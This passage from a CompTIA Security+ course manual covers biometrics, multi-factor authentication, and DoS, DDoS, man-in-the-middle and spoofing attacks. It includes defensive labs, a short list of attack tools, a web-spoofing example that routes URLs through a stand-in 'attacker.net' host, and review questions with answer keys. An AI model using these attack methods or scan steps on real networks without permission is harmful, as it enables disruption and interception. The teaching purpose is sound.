not sign their name in a consistent manner, which can cause a high error rate when using this system to authenticate. Ironically, the presence of a physical signature is often the rationale for not adding more robust authentication methods.

Authentication

227

Exhibit 2-8: Signature scanner by Interlink ePad VP9105 Voice authentication relies on voice-to-print technologies, not voice recognition. In this process, your voice is transformed into text and compared to an original template. Although this is fairly easy technology to implement because many computers already have built-in microphones, the enrollment procedure is more complicated than other biometrics, and background noise can interfere with the scanning, which can be frustrating to the user.

General trends in biometrics


Although biometrics tends to be far more reliable in terms of authentication than other means, it is generally too expensive for everyday use by individuals. A more promising area of biometric usage, other than their traditional use in highly secure areas, is in authenticating large numbers of people over a short period. This might become especially useful when smart cards gain wider acceptance because people can hold their own biometric information (something they generally prefer for privacy reasons) and simply insert the card into a slot and use whatever biometric scanner is required to prove their identity. The use of biometrics to gain remote access to controlled areas is also expected to rise, as users fear of identity theft during password authentication increases. Currently, however, factors limiting dramatic growth in this area are the large number of vendors and the different standards available. There needs to be more standardization in the industry before many companies will be willing to invest in such new technologies. Those companies that do invest will only require users who have access to very sensitive information and applications to use biometric authentication. Even though a biometric might be very difficult, if not impossible, to duplicate, steal, or forge, the templates that hold biometric patterns that are compared to the actual person during the time of authentication are still held in servers, which must be both physically and electronically secure. If a hacker were able to gain access to the files that link information about a user with their biometric, he or she would be able to copy their own biometric templates into that system, give themselves authority to access sensitive areas, or simply prevent others who should be allowed from doing so.

228

CompTIA Security+ Certification

Multi-factor authentication
There are three commonly recognized factors of authentication: Something you know, such as a password Something you have, such as a smart card Who you are (something about you), such as a biometric Multi-factor authentication requires that an individual be positively identified using at least one means of authentication from at least two of these three factors. When choosing which methods and how many factors to use to authenticate a person, its important to consider several implications of your choice. Each method of authentication has certain strengths and weaknesses and each, appropriately, requires people to exert a varying degree of time and effort to prove they are who they say they are. Adding additional factors of authenticity to your identification process decreases the likelihood that an unauthorized person can compromise your electronic security system, but it also increases the cost of maintaining that system. When deciding the degree of assurance you need about a persons identity, it is important to take into account both the cost of having an unauthorized person compromise your electronic security and the cost of having authorized people authenticate themselves before having access to the data and services they need on your network. As the cost of compromising your electronic security increases, so should your willingness to pay for that security, whether through the purchase and upkeep of hardware and software or through the expense of lost worker productivity.

Authentication Do it!

229

F-1:

Understanding how biometrics work

Questions and answers


1 Name four features that are measured using biometrics.
Answers might include:

Fingerprints Hand geometry Retinal and iris patterns Facial characteristics Handwritten signature

2 Biometrics is the most secure form of authentication because it relies on measuring: A B


C

What you know What you have Who you are

3 Which of the following circumstances can result in a false negative?


A

An authorized person is not authenticated An unauthorized person is wrongly authenticated An authorized person is authenticated but denied access to needed areas

B
C

4 Identify some of the benefits and drawbacks of using retinal scanning.


Benefits: Highly accurate, difficult to spoof, measures stable physiological trait Drawbacks: Difficult to use, relatively large device, expensive

5 Which of the following biometrics measures behavioral characteristics?


A

Handwritten signatures Iris scanning Fingerprints Voice

B C
D

230

CompTIA Security+ Certification

Unit summary: Authentication


Topic A In this topic you learned how the AAA model (authentication, authorization, and accounting) is applied to achieve security goals. You learned some techniques for creating strong passwords and storing them securely. You also learned how to modify the Windows Server 2003 local security policy to harden the system against attacks. In this topic, you saw how Kerberos provides a secure and convenient way for individuals to gain access to data and services through the use of session keys, tickets, authenticators, authentication servers, ticket-granting tickets, ticket-granting servers, and cross-realm authentication. In this topic, you learned about CHAP. You learned that CHAP provides a way for an authenticator to authenticate a peer using an encrypted challenge-and-response sequence. In this topic, you learned about private and public keys, digital certificates, and digital signatures. You learned how private and public keys and digital certificates authenticated by a trusted third party allow individuals and organizations to communicate with each other in a secure way. In this topic, you learned how tokens allow individuals to use strong passwords when logging on to a computer or network system. In this topic, you learned that biometrics provide the strongest means of individual authentication because they rely on measurements of individual physical characteristics and behaviors.

Topic B

Topic C

Topic D

Topic E Topic F

Review questions
1 Which of the following best describes authentication? A The process of gaining access to resources B The process of utilizing resources
C

The process of verifying the identification of a user

D The process of assigning permissions to users 2 What is the advantage in removing the name of the last user to log on? A Allows users to share computers B Requires users to remember their usernames
C

Requires a hacker to take an extra step when cracking passwords

D Hides the identity of the Windows Domain

Authentication 3 Why is password length important? A Longer passwords are impossible to hack
B

231

Longer passwords are harder to hack

C Windows requires long passwords in a domain environment D Longer passwords can prevent password cracking programs from working properly 4 What is the password length recommended by most security professionals? A Six or more characters B Five or more characters C Eight or more characters
D

Seven or more characters

5 Why are complex passwords important? (Choose all that apply.)


A

Complex passwords are more difficult to crack

B The complexity of passwords adds to the security of long passwords C Complex passwords are impossible to crack
D

Complex passwords help users create strong passwords

6 Which of the following is considered a complex password? (Choose all that apply.)
A B

@1c4htj3 Pa$$w0rd

C ncdjszkjdnc
D

Ajd649sg

7 CHAP stands for Challenge Handshake Authorization Protocol (CHAP). True or false?
False: CHAP stands for Challenge Handshake Authentication Protocol.

8 Which of the following is not a part of the CHAP authentication process? A The authenticating server compares the value it receives from the peer with the hash value it expects by calculating its own expected hash value.
B

The peer sends a challenge message to the authenticating server.

C The peer creates a variable-length value using a one-way hash function on a fixed-length input message. D The authenticating server issues new challenge messages to the peer at random intervals throughout the communication session. E The CHAP authentication process starts after the authenticating server tells the peer that CHAP will be used.

232

CompTIA Security+ Certification 9 There are many different password conventions; what are basic rules to follow in order to safeguard your passwords. (Choose all that apply.)
A B C D E

Passwords must be memorized. If they must be written down, the written records must be locked up. Each password you choose must be different from any other that you use. Passwords must be at least six characters long, and probably longer, depending on the size of the character set used. Passwords must contain a mixture of letters (both uppercase and lowercase), numbers, and other characters, such as %, !, or &. Passwords must be changed periodically.

10 Kerberos assumes that none of the workstations or servers is physically secure and that bad guys can position themselves between the user and the service being sought. True or false?
False: Kerberos assumes that workstations, servers, and other devices that are connected to the network are physically secure, and that there is no way for an attacker to gain access to a password by establishing a position between the user and the service being sought.

11 In a Kerberos system, after a client has received a ticket from an authentication server, it creates and adds an authentication that contains the users username and time stamp. True or false?
True

12 The authenticator in a CHAP session must return either a success or failure message to the sender once it has compared the expected hash value to the actual hash value. True or false?
True

13 Explain the difference between symmetric and asymmetric encryption.


In symmetric encryption, one key both encrypts and decrypts a message, and in asymmetric encryption, one key is used to encrypt the message and a different key is used to decrypt it.

14 An active token is a device that creates and shares modified or encrypted forms of the base key. True or false?
True

15 One-time passwords are vulnerable to which of the following attacks?


A B

Phone line redirection attacks IP theft

C Dictionary attacks
D

Man-in-the-middle attacks

Authentication 16 Which of the following is an example of a biometric? (Choose all that apply.) A Complex passwords
B C

233

Fingerprints Retinal scans

D Smart cards 17 A biometric that involves the measurement and analysis of different hand characteristics and measurements is called: A Fingerprints B Facial recognition
C

Hand geometry

D All of the above 18 A biometric that involves analyzing voice characters and measurements is called: A Voice-to-print technology B Facial recognition C Sound technology
D

Voice authentication

Independent practice activity


RunAs allows an administrator to log on with a standard user account and still run administrative programs with administrative rights. Those rights are only applied to the application, so viruses, worms, and Trojan Horses cannot access the network with administrative privileges. 1 Log on as User2. 2 Click Start, then choose Control Panel. 3 Double-click Local Security Policy. The User2 account should not be able to edit the Local Security Policy. Click OK. 4 Right-click Local Security Policy. Click Run As. 5 Select The following user. Enter the necessary administrator account information, and then click OK. You can now edit the local security policy. 6 Which of the following is an advantage in using the RunAs command? A Allows users to bypass security without permission B Helps prevent the spread of viruses C Conserves resources for administrators
D

Allows administrators to check e-mail and administer the network

234

CompTIA Security+ Certification 7 Which of the following is a disadvantage of the RunAs command? (Choose all that apply.) A Opens potential security holes
B C

Allows users to install applications if they know the local administrator password Allows users to access administrative tools if they know the local administrator password

D Allows users to change account permissions 8 How can you use RunAs on an existing shortcut? A Hold down the Alt key and right-click the shortcut B Right-click the shortcut
C

Hold down the Shift key and right-click the shortcut

D Hold down the Ctrl key and right-click the shortcut 9 What application should you not use RunAs to execute? A A virus scanner B An e-mail application
C

A word processor

D An auditing program 10 How can you prevent users from using RunAs? A Delete the RunAs command
B

Disable the RunAs Service

C Disable the Server Service D Delete the RunAs.dll file

31

Unit 3 Attacks and malicious code


Unit time: 180 minutes Complete this unit, and youll know how to:
A Recognize and defend against denial-of-

service (DoS) attacks, including SYN flood, Smurf, Ping of Death, and Distributed Denial of Service (DDoS) attacks.
B Identify man-in-the-middle attacks. C Recognize the major types of spoofing

attacks, including IP address spoofing, ARP poisoning, Web spoofing, and DNS spoofing.
D Discuss replay attacks. E Explain TCP session hijacking. F Detail various types of social-engineering

attacks, and explain why they can be extremely damaging.


G List the major types of attacks used against

encrypted data.
H List the major types of attacks used against

encrypted data.

32

CompTIA Security+ Certification

Topic A: Denial of service attacks


This topic covers the following CompTIA Security+ exam objectives:
# 1.3 Objective Identify non-essential services and protocols and know what actions to take to reduce the risks of those services and protocols Recognize the following attacks and specify the appropriate actions to take to mitigate vulnerability and risk DOS / DDOS (Denial of Service / Distributed Denial of Service)

1.4

Introducing denial of service attacks


Explanation A denial-of-service (DoS) attack is any attack that consumes or disables resources in order to interrupt services to legitimate users. The objective of the DoS attack is to disrupt normal operations, but not destroy or steal data. This causes inconvenience at best, diminished revenue and reputation for the victim at worst. DoS attacks represent a major problem to security administrators because they take numerous forms, are very common, and can be very costly to the attacked businesses. A wide range of attack tools are available that allow malicious users to attack systems of all sorts, and many of the tools have easy-to-use graphical user interfaces. A DoS attacker need not have deep knowledge of networks or systems in order to launch a damaging attack, because many of the attack tools require only basic computer knowledge to operate. Modes of attack include: Causing an application or operating system on a victims computer to crash, making it unusable to legitimate users. Clogging network connections to a Web server with illegitimate traffic, slowing the users traffic down, or making it completely unable to reach the Web site. Overloading the victim system by consuming resources such as disk space, bandwidth, buffers, and queues. An overwhelmed system might offer its users very sluggish performance or might be completely unusable. Using the normal behavior of a system to deny access to its users. For example, an attacker could cause a user to be locked out of a given computer by attempting to log on to the system with an incorrect password three times. Many computer systems lock out a users account for a preset time period after the third failed logon attempt. Remotely causing a network device to crash, temporarily making the network inaccessible to attached devices. Overwhelming a DNS server with lookup requests until it runs out of memory and crashes, making it impossible to resolve addresses for the domains it serves, and thereby interrupting access to any Web pages within the domain. Security administrators should be familiar with the more common DoS attacks in order to secure their networks and systems from such attacks. A representative sampling of attacks is presented in the following sections.

Attacks and malicious code

33

SYN flood
A SYN flood attack prevents users from accessing a target server by flooding it with half-open TCP connections. Normal TCP connections between two hosts are arranged with an exchange of three packets. 1 The first packet is sent from the client to the server with the SYN flag set. 2 The server acknowledges the session by replying with a packet that has both the SYN and the ACK flags set (a SYN/ACK packet). 3 The client responds to the server with an ACK packet. The TCP session is completely established and the two hosts are able to exchange data. If, for some reason, the client doesnt complete the connection by sending the ACK packet, the server waits a couple of minutes, giving the client plenty of time to respond, before clearing the uncompleted connection from memory and making it available for use by others. The TCP session setup process is shown in Exhibit 3-1.

If students question what the abbreviations in the Exhibit mean: SEQ is the packet sequence number, CTL is the control flag, SYN is the synchronize control flag, and ACK is acknowledgement. More information about threeway handshakes can be found in RFC 793.

Exhibit 3-1: TCP three-way handshake Although most computer systems can handle many established network connections, they usually can handle only a handful of connections that are in the process of being established (or half-open connections). This is because connections are usually set up in such a short amount of time that there is no need for a long queue for half-open connections. Conducting SYN flood attacks An attacker can render a machine unavailable to network users by filling the half-open connections queuewithout permitting the connections to be completed and moved into the list of fully open connections. This is accomplished by flooding the server with SYN packets that have a spoofed source address. The server responds with an SYN/ACK packet to the fake source address, but never receives the ACK reply, which is needed to complete the TCP connection. The server cannot accept any more TCP connections until the half-open connections time-out, so legitimate users can be prevented from reaching the server.

34

CompTIA Security+ Certification Countermeasures Many commercial firewall products have features to reduce the effect of SYN floods. The firewall sits between the attacking client machine and the attacked server, so it has the ability to withhold or insert packets into the data stream as necessary to thwart SYN floods. One strategy used by firewalls is to immediately respond to the servers SYN/ACK packet with an ACK that uses the spoofed IP address of the client, as shown in Exhibit 3-2. This permits the server to move the session out of the half-open connections queue. If the connection is a legitimate one, the client shortly responds with its own ACK packet, which the firewall can forward to the server with no negative impact. If the connection is not legitimate, then no ACK is forthcoming from the client. In this case, the firewall can safely kill the TCP session by sending the server an RST (reset) packet. This is just one example of how firewalls can mitigate the effect of SYN floods; every firewall manufacturer has its own strategy. Other countermeasures include: Increase the size of the servers half-open connection queue. Decrease the queues time-out period, limiting the number of half-open connections from a single IP. Use network-based intrusion detection systems that can detect SYN floods and notify administrators.

Exhibit 3-2: Defending against the SYN flood SynAttackProtect You can protect your server from SYN floods with the TCP/IP parameter SynAttackProtect. This parameter is used to enable SYN flooding attack. A value of 1 enables this if the TcpMaxConnectResponseRetransmissions value is at least 2. This protection detects SYN flooding and then reduces the time spent on server connection requests that can't be acknowledged. This entry can be added to Windows Server 2003 through Regedit.

Attacks and malicious code Do it!

35

A-1:

Protecting against SYN flood attacks Heres why


Setting the SynFloodAttack parameter in the Windows registry makes a Windows NT, 2000 or Server 2003 network more resistant to SYN flood attacks.

Heres how
1 Log on to the Windows Server 2003 server as Administrator

2 Click Start 3 Choose Run Enter regedit Click OK 4 Expand


HKEY_LOCAL_MACHINE To open the Registry Editor window.

5 Expand SYSTEM 6 Expand CurrentControlSet

7 Expand Services 8 Expand Tcpip 9 Select Parameters 10 Right-click Parameters 11 Choose New, DWORD Value

Enter SynAttackProtect

36

CompTIA Security+ Certification 12 Right-click SynAttackProtect Choose Modify 13 In the Value Data field, enter 1 Click OK 14 Close the Registry Editor window
A value of 1 enables the parameter. To start the process of changing the parameter value.

Attacks and malicious code

37

Smurf
Explanation Smurf is a non-OS specific attack that uses a third-partys network segment to overwhelm a host with a flood of Internet Control Message Protocol (ICMP) packets. As shown in Exhibit 3-3, three parties are involved: the attacker, an intermediary network (preferably, with numerous hosts), and the victim (typically, a computer or router on the Internet). 1 The hacker sends a ping (echo-request) packet to the intermediary networks broadcast address. The packets source IP address is faked to be that of the victim system. 2 The ping was sent to the broadcast address of the intermediary network, so every host on that subnet replies to the victims IP address. 3 The third-partys hosts unwittingly deluge the victim with ping packets. Using this technique, the hacker cannot only overwhelm the computer system receiving the flood of echo packets, but can also saturate the victims Internet connection with bogus traffic and therefore delay or prevent legitimate traffic from reaching its destination.

Exhibit 3-3: Smurf attack Countermeasures Protective measures against Smurf attacks can be placed in the network or on individual hosts. Configure routers to drop ICMP messages from outside the network with a destination of an internal broadcast or multicast address. Configure hosts to ignore echo requests directed to their subnet broadcast address. Most current router and desktop operating systems have protection in place to guard against well-known Smurf attacks by default, but changes to the configuration or new modifications of the attack might make the network and hosts vulnerable.

38

CompTIA Security+ Certification

Ping of Death
There are a number of attacks that exploit some operating systems incorrect handling or error checking of fragmented IP packets. The Ping of Death is a well-known exploit that uses IP packet fragmentation techniques to crash remote systems. When first released, this shockingly simple attack had the ability to crash any machine that could receive a ping packet. All the attackers needed to use in this attack was the victims IP address! Mode of attack
Explain the nature of IP packets and the concept of the MTU. You can explain an MTU by using a floppy disk analogy. If you want to transfer 5MB of information from one computer to the other using a floppy disk, you will have to split the information up into chunks small enough for the floppy to handle and then reassemble the data on the other computer.

This common exploit misuses the way that large IP packets (or more specifically, ICMP packets, because the attack uses a ping) are transmitted across networks. The maximum size of an IP packet is 65,535 bytes, but packets that are large cannot be transmitted on many network topologies. For example, the maximum transmission unit (MTU) for Ethernetprobably the most commonly used LAN topologyis only 1500 bytes. To transmit a large IP packet across a LAN, hosts and routers fragment IP packets into smaller Ethernet frames, and then reassemble the fragments at the destination. Each fragment contains an offset value that tells the receiving host where to insert its data into the reassembled packet. In the Ping of Death, a very large ICMP (ping) packet is crafted and transmitted to the victim, fragment by fragment. With each fragment, the size of the reassembled ping grows to near the 65,535-byte size limit of the IP packet. When the final fragment arrives, its offset value forces the packet to grow beyond the IP size limit, causing the victim host to crash. Countermeasures What made this attack particularly problematic was that recent Windows operating systems allowed the generation of nonstandard pings from the regular user command line, but the same systems would die when presented with one of these packets. Most manufacturers have now provided patches that make their systems invulnerable to the Ping of Death and other types of IP fragmentation attacks. Starting with Windows 2000, Microsoft has removed the ability to generate ICMP packets of invalid size by setting the maximum packet size to 53,000 bytes.

Attacks and malicious code Do it!

39

A-2:

Discussing DoS attacks

Questions and answers


1 A SYN flood exploits the nature of the TCP three-way handshake. True or false?
True

2 The SYN attack inhibits services by which of the following? A B


C

Flooding a host with ICMP messages Transmitting excessively large IP packets Filling the half-open connection queue with bogus connections Overwhelming a DNS server with lookup requests

3 What are some ways to defend against Smurf attacks?


Set filters on firewalls and routers to drop ICMP messages. Configure hosts to ignore echo requests directed to their subnet broadcast address.

4 How can you defend against Ping of Death attacks?


Limit ICMP packet size. Install the latest security patches on your clients and servers.

310

CompTIA Security+ Certification

Distributed Denial-of-Service attacks


Explanation A distributed denial-of-service (DDoS) attack is a network attack where the attacker manipulates multiple hosts to carry out a DoS attack on a target. It usually results in the temporary loss of access to a given site and an associated loss in revenue and prestige for the victim. The tools are automated, so a script kiddie (a malicious person on the Internet who is able to use automated attack tools but has limited technical understanding of how they work) can execute DDoS attacks. They are easy to launch, are extremely effective, and have become the tool of choice for malicious hackers targeting government and business Internet sites. Setting up DDoS attacks As shown in Exhibit 3-4, the first step in setting up a DDoS assault is for the attacker to compromise a machine to be used as a handler.

Exhibit 3-4: Distributed denial-of-service attack This is typically a large machine with plenty of disk space and a fast Internet connection, so the malicious hacker has the resources necessary to upload an exploit toolkit. Its important that the hacker go undetected on the handler machine, so hosts with a large number of user accounts or inattentive system administrators are targets for use as handlers. Once the handler has been setup with the necessary software tools, it begins to use automated scripts to scan large chunks of ISP address space (DSL and cable customers making the best targets because of their bandwidth and constant connection) to find hosts to use as agents, or zombies. The scripts used for this purpose generally target specific, known vulnerabilities in Windows operating systems and can complete the task of compromising each system and uploading the zombie software within a matter of seconds. The software is transparent to the machines owner, as it is imperative to the attacker that their tools go undetected.

Attacks and malicious code

311

Hundreds or thousands of zombies might be required to launch a successful DDoS attack, because most major Web sites have sufficient bandwidth and server resources to handle substantial amounts of network traffic. This is not an obstacle for the determined script kiddie, as the ever increasing number of unprotected home PCs connected to the Internet provides ample fodder for creating a large army of zombies. Conducting DDoS attacks The agent software on compromised hosts usually communicates with the handler machine via Internet Relay Chat (IRC) connections. These hosts are automatically logged on to an IRC channel where they passively wait for attack orders from the handler machines. When the malicious hacker is ready to launch the attack, a command is issued through the handler machine to the thousands of agents connected to the channel. Depending on the type of agent software installed, the attacker has a number of attack types to choose from, as listed in the following table:
Tools If students are unfamiliar with UDP explain that it is a connectionless protocol often used for network broadcast messages. Trin00 Tribe flood network Stacheldracht and variants TFN 2K Shaft More information about Trinity can be found at www.ciac.org/ciac/ bulletins/k-072.shtml Mstream Trinity, Trinity v3 Flooding or attack methods UDP UDP, ICMP, SYN Smurf UDP, ICMP, SYN Smurf UDP, ICMP, SYN Smurf UDP, ICMP, SYN combo Stream (ACK) UDP, SYN, RST, Random Flag, ACK, Fragment

When the attacker is ready to launch the attack, the zombies are remotely instructed to flood the victim networkwhich they do without the machines owners ever being aware that their computer has been compromised. For an account of a DDoS attack, and the hackers methods and objectives, see Steve Gibsons account at http://grc.com/dos/grcdos.htm.

312

CompTIA Security+ Certification DDoS countermeasures The following table outlines actions you can take to safeguard your network against DDoS attacks.
Equipment Clients and servers Action Install the latest security patches from your software vendors. Install and configure personal firewalls on desktop PCs. Install antivirus software and maintain up-to-date signatures. Perform regular hard disk scans with the antivirus software. E-mail servers Install antivirus software on all mail servers, both internal and external, to protect the network from e-mail worms. Filter packets coming into the network destined for a broadcast address. This can help to prevent your network from being susceptible to the Smurf attack. Turn off directed broadcasts on all internal routers. This also internally prevents a Smurf attack. Block any packet from entering your network that has a source address that is not permissible on the Internet. This type of address would include RFC 1918 address space (10.0.0.0, 172.16.24.0, and 192.68.0.0), multicast address space (224.0.0.0), and loopback addresses (127.0.0.0). Block any packet that uses a protocol or port that is not used for Internet communications in your network. Block packets with a source address originating inside your network from entering your network. Block packets with fake source addresses from leaving your network.

Inform students that a detailed discussion of firewalls will be offered later in the course.

Firewalls and routers

Attacks and malicious code Do it!

313

A-3:

Scanning for zombies Heres why


DDOSPing is a detection utility that scans for the most common DDoS programs. This tool will detect Trin00, Stacheldraht, and Tribe Flood Network programs running with their default settings. A download link for this software is provided at http://www.foundstone.com/ knowledge/proddesc/ddosping.html.

Heres how
See the classroom setup instructions for the location of the download file.

1 Download the DDoSPing software according to your Instructors directions

2 Extract the program into


C:\Security

3 In Windows Explorer, go to C:\Security and double-click


ddosping.exe

The DDoSPing window appears.

4 Under Transmission speed control, move the slide bar to


max
Limit the range of IP addresses to classroom PCs. This type of scan is often detected by a network administrator and might violate computer use policies if done without permission.

5 Under Target IP address range, enter the range specified by your Instructor

This type of scan is often detected by a network administrator and might violate computer use policies if done without permission.

6 Click Start

The scan will take a few seconds to complete. Wait until the Program stopped message appears. To determine whether the system is infected. If no names appear in the Infected Hosts section and in the Status section, Zombies detected is 0, your system is clean.

7 Review the Infected Hosts and Status sections

8 Close the DdoSPing window

314
Do it!

CompTIA Security+ Certification

A-4:

Discussing DDoS attacks

Questions and answers


1 Which of the following are DDoS tools? A B C
D

Trin00 Trinity Mstream All of the above

2 List three countermeasures you can implement to protect clients and servers from DDoS attacks.
Answers might include:

Install the latest security patches Install and configure personal firewalls on desktop PCs Install antivirus software and maintain up-to-date signatures Perform regular hard disk scans with the antivirus software

3 Number the steps to launch a DDoS attack in the proper sequence. ___ Zombies log onto IRC channel to communicate with the handler ___ Zombies flood the victim network ___ Attacker compromises machine to be used as a handler ___ Handler uploads the zombie software ___ Handler scans for hosts to use as agents or zombies ___ Handler launches attack
3 5 4 1 6 2

Attacks and malicious code

315

Topic B: Man-in-the-middle attacks


This topic covers the following CompTIA Security+ exam objectives:
# 1.3 Objective Identify non-essential services and protocols and know what actions to take to reduce the risks of those services and protocols Recognize the following attacks and specify the appropriate actions to take to mitigate vulnerability and risk Man in the Middle

1.4

The purpose of man-in-the-middle attacks


Explanation Man-in-the-middle refers to a class of attacks in which the attacker places himself between two communicating hosts and listens in on their session. The key to this concept is that both hosts think they are communicating with the other, when they are in fact communicating with the attacker, as shown in Exhibit 3-5.

Exhibit 3-5: Man-in-the-middle attacks

316

CompTIA Security+ Certification Man-in-the-middle attacks have a variety of applications, including: Web spoofing This is an attack in which the assailant arranges his Web server between his victims Web browser and a legitimate server. In this case, the attacker can monitor and record the victims online activity, as well as modify the content being viewed by the victim. TCP session hijacking By arranging for traffic between two hosts to pass though his machine, an attacker can actually take over the role of one of them and assume full control of the TCP session. For example, by monitoring a victims communications with an FTP server, the attacker can wait for the victim to authenticate and then hijack the TCP session and take over the users access to the FTP server. Information theft The attacker can passively record data communications in order to gather sensitive information that might be passing between two hosts. This information could include anything from industrial secrets to username and password information. Many other attacks, including denial-of-service attacks, corruption of transmitted data, or traffic analysis to gain information about the victims network.

Conducting man-in-the-middle attacks


Man-in-the-middle attacks can be accomplished using a variety of methods; in fact, any person who has access to network packets as they travel between two hosts can accomplish these attacks: ARP poisoning Using Hunt, a freely available tool that uses ARP poisoning, an attacker can monitor and then hijack a TCP session. This requires that the attacker be on the same Ethernet segment as either the victim or the host with which it is communicating. ICMP redirects Using ICMP redirect packets, an attacker could instruct a router to forward packets destined for the victim through the attackers own machine. The attacker can then monitor or modify the packets before they are sent to their destination. DNS poisoning An attacker redirects victim traffic by compromising the victims DNS cache with incorrect hostname-to-IP address mappings. Countermeasures To protect against man-in-the-middle attacks, routers should be configured to ignore ICMP redirect packets. Countermeasures for ARP and DNS poisoning will be examined in the following discussion of spoofing techniques.

Attacks and malicious code Do it!

317

B-1:

Reviewing man-in-the-middle attacks

Questions and answers


1 Define man-in-the-middle attacks.
This is a class of attacks in which the attacker places himself between two communicating hosts and listens in on their session.

2 TCP session hijacking is an attack in which the assailant arranges his Web server between his victims Web browser and a legitimate server. True or false?
False: Web spoofing does this

3 State three goals for man-in-the-middle attacks.


Answers might include:

Monitor and record a victims online activity Modify information presented to a user Hijack a session Gather confidential information

318

CompTIA Security+ Certification

Topic C: Spoofing
This topic covers the following CompTIA Security+ exam objectives:
# 1.3 Objective Identify non-essential services and protocols and know what actions to take to reduce the risks of those services and protocols Recognize the following attacks and specify the appropriate actions to take to mitigate vulnerability and risk Spoofing

1.4

Spoofing types
Explanation Spoofing is pretending to be someone else by imitating or impersonating that person. When you present credentials (for example, a username/password, hostname, or IP address) that are not yours in order to gain access to a network, then you are spoofing that system. This is much like presenting a fake drivers license to illegally buy alcohol or presenting fake credentials to appear as a law enforcement official. Four primary types of spoofing are issues for the information security professional: IP address spoofing ARP poisoning Web spoofing DNS spoofing

IP address spoofing
IP address spoofing gains access to a victim by generating TCP/IP packets with the source address of a trusted host. The attacker uses this deception to bypass filters on routers and firewalls and gain access to network resources. The sequence of events for an attack that uses IP spoofing is described below and pictured in Exhibit 3-6. 1 The attacker identifies a target, the victim of the attack, and a machine that is trusted by the victim. The attacker disables the trusted machines ability to communicate by flooding it with SYN packets. 2 The attacker uses some mechanism to determine the sequence numbers to be used by the victim. This could involve sampling packets between the victim and trusted hosts. The attacker spoofs the source IP address of the trusted host in order to send his or her own packets to the victim. 3 The victim accepts the spoofed packet and responds. Although the network infrastructure automatically routes the victims reply packets to the trusted host, the trusted host is unable to process the packets because of the SYN flood attack against it. 4 Blind to the victims response, the attacker must guess its contents and craft an appropriate response, again using a spoofed source address and a guessed sequence number.

Attacks and malicious code

319

Exhibit 3-6: Filtering spoofed packets Challenges There are three primary challenges faced by the attacker using IP address spoofing. 1 Although the hacker can craft packets that can be routed via the Internet, past the firewall, to the victim, the perpetrator cannot cause the return packet to be delivered back to his or her machine. This is because the network automatically routes the reply packet to the trusted host. In such a case, the hacker is flying blind and cannot hear the victim hosts responses. 2 The victims reply packets are automatically delivered to the trusted host by the network infrastructure. If the trusted host the hacker is spoofing responds to the packets that it is receiving from the victim, it could interfere with the scheme. To prevent this from happening, the hacker needs to DoS the trusted host to keep it from responding to the victims packets. This can be accomplished with an SYN flood. 3 This hurdle is perhaps the most difficult to leap: in order for the victim host to accept the spoofed packets from the hacker, the packets must have the correct sequence number. The initial sequence number (ISN) is provided by the victim host as part of a session setup. Remember that the hacker cannot receive any packets back from the victim during the spoofed session. The hackers ability to craft packets with the correct sequence numbers (which are therefore accepted by the victim) is reliant upon the hackers ability to narrow the ISN down to an acceptable range, and to predict subsequent sequence numbers based on knowledge of the ISN and the victims algorithm for determining subsequent sequence numbers.

320

CompTIA Security+ Certification Countermeasures To prevent IP spoofing, disable source routing on all internal routers. Also, filter out packets entering the local network from the Internet that have a source address of the local network.

Do it!

C-1:

Scanning IP addresses Heres why


(Follow your Instructors directions.) Foundstones SuperScan is a powerful connectbased TCP port scanner, pinger, and hostname resolver. A download link for this software is provided at www.foundstone.com/knowledge/ proddesc/superscan.html.

Heres how
See the classroom setup instructions for location of the download file.

1 Download the Foundstone SuperScan software

2 Unpack the program into


C:\Security

3 In Windows Explorer, go to C:\Security and double-click


SuperScan4.exe
Limit the range of IP addresses to classroom PCs. This type of scan is often detected by a network administrator and might violate computer use policies if done without permission.

The SuperScan window appears.

4 Under IPs, enter the IP address range specified by your Instructor

5 Click the right arrow key next to the IP address range 6 Click the blue Start arrow 7 Review the results 8 Based on the results of the scan, which IP Addresses are in use?

To add the address range as the range to be scanned. To start the scan.

Answers will vary. Notice that the IP address of the host performing the scan is not included in the list. This is because no ports are open on the host performing the scan and by default; hosts without open ports aren't listed. This type of information is very useful to hackers.

9 Which ports are open on those systems? 10 When you are done viewing the scan results, close the application window

Attacks and malicious code

321

ARP poisoning
Explanation ARP (Address Resolution Protocol) poisoning is a technique used to corrupt a hosts ARP table, allowing the hacker to redirect traffic to the attacking machine. The attack can only be carried out when the attacker is connected to the same local network as the target machines. Operation ARP operates by sending out ARP request packets. An ARP request broadcasts the question, Whose IP address is x.x.x.x? to all computers on the LAN, even on a switched network. Each computer examines the ARP request and checks if it is currently assigned the specified IP. The machine with the specified IP address returns an ARP reply containing its MAC address. To minimize the number of ARP packets being broadcast, operating systems keep a cache of ARP replies. When a computer receives an ARP reply, it will update its ARP cache with the new IP/MAC association. ARP cache poisoning occurs when an attacker sends forged ARP replies. In this case, a target computer could be convinced to send frames to the attackers PC instead of the trusted host. When done properly, the trusted host will have no idea this redirection took place. Attack tools used for ARP poisoning include ARPoison, Ettercap, and Parasite. These tools are able to spoof ARP packets to perform man-in-the-middle attacks, redirect transmission, or to simply intercept packets. Countermeasures To stop ARP poisoning, use network switches that have MAC binding features. Switches with MAC binding store the first MAC address that appears on a port and do not allow the mapping to be changed without authentication.

Web spoofing
A Web spoofing attack convinces its victims that they are visiting a real and legitimate site, when they are in fact visiting a Web page that has either been created or modified by the attacker for duping the victim. The attacker can then monitor or modify any data passing between the victim and the Web server. Web spoofing attacks come in two flavors: Man-in-the-middle attacks Denial of Service attacks Man-in-the-middle attacks In this form of Web spoofing, the attacker rewrites the URLs embedded in the Web pages to point to the attackers Web server rather than a legitimate server. This is accomplished using automated URL editing tools. Assuming the attackers server is on machine www.attacker.net, the attacker rewrites each URL to begin with http://www.attacker.net/. The link http://newspaper.com becomes http://www/attacker.net/http://newspaper.com.

322

CompTIA Security+ Certification When the victim clicks on the revised URLs, the browser requests a page from the attackers server, which then requests the page from the real server. The attackers server revises the pages URLs before providing the edited version to the victim. Using this method, every page on the World Wide Web can be altered to pass through the attackers server, as shown in Exhibit 3-7.

Exhibit 3-7: Web spoofing Denial of Service attacks Another form of Web spoofing displays a false, but convincing Web page to the victim with the objective of obtaining confidential information or providing false information. The Web page mimics a legitimate Web page, but the content is altered to redirect communications from the intended site to the attackers server. To see some examples of Web spoofing, visit the following page:
http://www.cs.dartmouth.edu/~pkilab/demos/spoofing/

Demonstrate the Web spoofing examples.

